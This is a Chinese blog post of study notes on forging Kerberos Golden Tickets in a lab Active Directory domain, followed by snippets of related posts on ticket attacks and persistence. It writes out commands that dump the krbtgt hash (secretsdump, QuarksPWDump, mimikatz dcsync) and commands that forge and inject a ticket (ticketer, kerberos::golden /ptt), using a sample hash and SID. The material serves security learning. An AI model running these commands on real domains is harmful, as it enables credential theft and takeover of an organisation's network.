内网渗透--Golden Ticket(黄金票据)制作&利用

已于 2024-01-24 15:40:03 修改
阅读量2.4k 收藏 33
点赞数 25
分类专栏: 内网渗透 #学习笔记 文章标签: 安全 网络安全
于 2024-01-17 14:35:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62169455/article/details/135231057
版权

一、基础知识

1. 票据原理

伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用

2. 作用

可用于横向移动、权限维持

3. 利用条件

  • 需要知道KDC密钥分发中心账户Krbtgt的hash(最核心,最重要的条件)

krbtgt是域用户,不是域控上的本地用户所以存储不在域控的SAM文件中,而是在ntds文件中

获取krbtgt的hash值,该值的方式有两种:

(1)控制了域控然后查询

使用卷影拷贝技术离线读取或者在线读取

使用secretsdump工具,命令:secretsdump.exe 域名/administrator:密码@IP

QuarksPWDump工具,命令:QuarksPWDump.exe --dump-hash-domain --ntds-file ntds.dit(Ntds这个文件必须先要导出)

mimikatz工具,命令:lsadump::dcsync /domian:域名 /user:krbtgt

(2)通过dsync查询 milikatz->lsadump::dcsync /domian:域名 /user:krbtgt

注:dcsync技术必须有administrator组内用户、Domain Admins组内用户、Enterprise Admins组内用户、域控制器的计算机账户以及域控的Administrator和system的支持

  • 需要知道域名   

命令:system

  • 需要知道SID值  

获取SID值,命令:whoami /all

  • 伪造的用户(一般都是管理员权限)

二、制作&使用

1. impacket中的工具ticketer(该工具是本地生成的)

命令:ticketer -domain-sid sid值 -nthash krbtgt-hash -domain 域名 伪造的用户

2. mimikatz直接生成然后导入到内存中

命令:Kerberos::golden /user:administrator /domain:域名 /sid:SID值 /krbtgt:NTLM-HASH /ptt(后面如果携带ptt就会自动注入到内存,如果不携带就会在本地生成)

三、实验操作

1. 信息收集

域控:win server 2012 R2   

域内机:Win 7

根据上面所讲述的,这里制作黄金票据需要先收集有SID值、krbtgt的hash值以及域名

获取SID值:

获取域名

 获取krbtgt的hash值

2. 生成票据&利用

前期我们已经拿到制作票据需要的信息,然后换到一台普通的域内机器,这里我直接使用mimikatz来生成票据:

Kerberos::golden /user:administrator /domain:xiaodi.local /sid:S-1-5-21-1695257952-3088263962-2055235443 /krbtgt:558ae7f88589153355cbeb046ac696df /ptt

然后使用命令klist,可以查看生成的票据

3. 访问测试

这时候黄金票据已经成功生成,直接去访问域控的c盘,验证一下

成功访问域控 

本文所涉及到的工具,关注公众号【404攻防实验室】,回复666,即可得到本文实验工具

红队内网攻防渗透内网渗透内网对抗:权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 648
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据。白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 证,银仅允许攻击者伪造特定服务的证授予服务 (TGS) 票据。白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
[域权限维持 & 票据攻击] Golden Ticket 黄金票据制作原理及利用方式
最新发布
Blue17 の 小窝
03-06 911
Client 在与 TGS 的交互中,有了黄金票据(TGT)之后,就会自动跳过 AS 的验证即不用验证你的身份(账号和密码),然后你就可以拿着这个伪造的 TGT,去 TGS 申请任意服务,比如 ”域控的访问权“,而由于 TGT 签名是采用 Krbtgt 这个账户的密码签名的,所以即使域管改了密码,你也依旧可以拿着 ”黄金票据“ 进域控。如上,通过黄金票据,我们能轻易伪造通向域中任意计算机(包括域控)的通行证,只要目标的 Krbtgt 账户密码不更改,我们就能对这个域拥有绝对的控制权。
黄金票据——域渗透
include_voidmain的博客
03-14 741
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2516
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户 0x02 黄金票据和krbtgt 用户的关系 ​ Golden Ticket(下面称为)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了
内网横向——域渗透黄金票据复现
ytdd66的博客
04-03 2022
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个域的域控中,而Client和Server为域内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
渗透黄金票据
ClarkAlbert的博客
10-29 1735
渗透黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows域中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 438
krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
黄金票据制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-13 438
当我们获得域控的控制权限后,有可能获取域内所有用户的hash,和krbtgt的hash。这时,由于一些原因导致我们失去对目标的控制权,但是我们还留有一个普通用户的权限,并且krbtgt的密码没有更改,此时我们可以利用krbtgt用户的NTLM Hash制作黄金票据伪造TGT,重新获取域控的管理权限。
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 922
内网安全之权限维持
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
黄金/白银票据制作
weixin_67925097的博客
08-29 1437
免责声明:该文章仅提供学习交流,若用于违法行为与本人无关。
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 4646
黄金票据Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
黄金票据原理制作利用
G3et的博客
01-14 706
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
黄金票据制作原理及利用方式
Happy峰
09-23 3066
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
内网渗透-(黄金票据和白银票据)详解()
duoba_an的博客
03-31 2828
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
渗透黄金票据与白银票据
dys的博客
07-19 650
黄金票据和白银票据 kerberos协议
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 1098
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值